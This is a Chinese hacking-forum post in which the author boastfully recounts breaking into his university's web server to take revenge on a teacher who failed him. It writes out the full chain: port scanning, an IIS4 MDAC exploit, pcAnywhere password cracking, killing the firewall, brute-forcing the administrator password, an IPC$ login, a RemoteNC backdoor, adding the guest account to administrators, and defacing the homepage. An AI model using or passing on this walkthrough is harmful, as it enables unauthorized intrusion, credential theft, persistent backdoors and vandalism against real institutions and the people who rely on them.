|
作者: jwm3337 [jwm3337] 论坛用户 | 登录 |
先用ping命令看看ip是不是存活。 ping www.xxx.edu.cn (此处过滤) Pinging cernet-sx.xxx.edu.cn [xxx.xxx.xxx.xxx] with 32 bytes of data: Reply from xxx.xxx.xxx.xxx: bytes=32 time=50ms TTL=116 Reply from xxx.xxx.xxx.xxx: bytes=32 time=40ms TTL=116 Reply from xxx.xxx.xxx.xxx: bytes=32 time=40ms TTL=116 Reply from xxx.xxx.xxx.xxx: bytes=32 time=40ms TTL=116 Ping statistics for xxx.xxx.xxx.xxx: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 40ms, Maximum = 50ms, Average = 42ms 我们注意ttl: (注释:指定数据报被路由器丢弃之前允许通过的网段数量。 TTL 是由发送主机设置的,以防止数据包不断在 IP 互联网络上永不终止地循环。 转发 IP 数据包时,要求路由器至少将 TTL 减小 1! UNIX 及类 UNIX 操作系统 ICMP 回显应答的 TTL 字段值为 255 Compaq Tru64 5.0 ICMP 回显应答的 TTL 字段值为 64 微软 Windows NT/2K操作系统 ICMP 回显应答的 TTL 字段值为 128 微软 Windows 95 操作系统 ICMP 回显应答的 TTL 字段值为 32 有的经过修改注册表可以修改ttl返回的值的!) 但是,俺估计,学校那帮菜网管,是不会的! 所以,俺判断是nt,所以拿来nape,先扫扫断口!呀! 结果出来了! 找不到netbios断口!呵呵!或许网管被学校的地下“黑客”扫怕了,所以加固了nt系统 并去掉了所有没必要的netbios服务,或者弄了个放火墙。 只有80和1433和5631是开着的!俺想放火墙,怎么办? 俺收集一下nt信息,看看是什么版本的! telnet xxx.xxx.xxx.xxx 80 输入:HEAD/index.htm 回车显示是microsoft,iis4.0(有点老了)! 根一本书上说,这个的版本有个mdac漏洞!或许能有作用,俺下了webping.pl进行攻击 哈哈!很快,几秒种后,提示俺“administrator"访问! 到黑白下了个Pwdump去弄pcanywhere的密码,俺输入:dir *cif/s 找到后,把它用tftp拉过来!到小榕那下了个流光破密码! 密码很快就出来了! users521,俺用pcanywhere和它一连!结果进去了~!哈哈!俺以为大工告成呢!谁知道 系统被锁定!大概是设置了登陆时间或者登陆次数吧!nnd! 再来!回到自己的电脑!窜到bigchen(http://www.ujc081.chinaw3.com/)那。下了个 PSAdmin.zip,解压后用tftp弄上去!运行pslist.exe,找到放火的id 用pskill.exe杀了放火的! 再用nape扫描,哈哈!netbios被打开,可以进行ipc探测了! 下了,x-caner.exe 暴力破!很快出来了! administrator 密码:admin!・#¥ 弱智型的 哈哈!现在我就是上帝了。 net use \\ip\ipc$ "admin!@#$" /user:"administrator" 命令成功完成 (这几个字真熟悉) 拉下小榕的RemoteNC.exe先做个后门, RemoteNC xxx.xxx.xxx.xxx administrator admin!@#$ RunAsUser "acces" "Provide Local CMD Redirect" 666 lovetecher 没有成功,换了LocalSystem模式,后成功了! telnet ip 666 输入密码后 RemoteNC>net user guest /active:yes 激活guest RemoteNC>net user guest lovedo 加个密码为:lovedo RemoteNC>net localgroup administrators guest /add 把guest加到管理员组 RemoteNC>quit 退出 哈哈!后门做好了!,这个时候虽然很高兴,可是还是很气愤,老师呀!老师! 为什么要挂我呢? 在主页上随便找个图片,index-09.gif 然后在telnet 666 找主页存放的位置: RemoteNC>dir d:\index-09.gif/s 驱动器 D 中的卷没有标签。 卷的序列号是 303A-11EE d:\wwwroot\admin\tupian 主页在d:\wwwroot\admin里了!退出后 做了一个简单的页面,写上某某老师收礼物的字样 加上,一个大大的红红的太阳图片! copy 到主机d:\wwwroot\admin替换!! |
地主 发表时间: 09/21 13:00 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号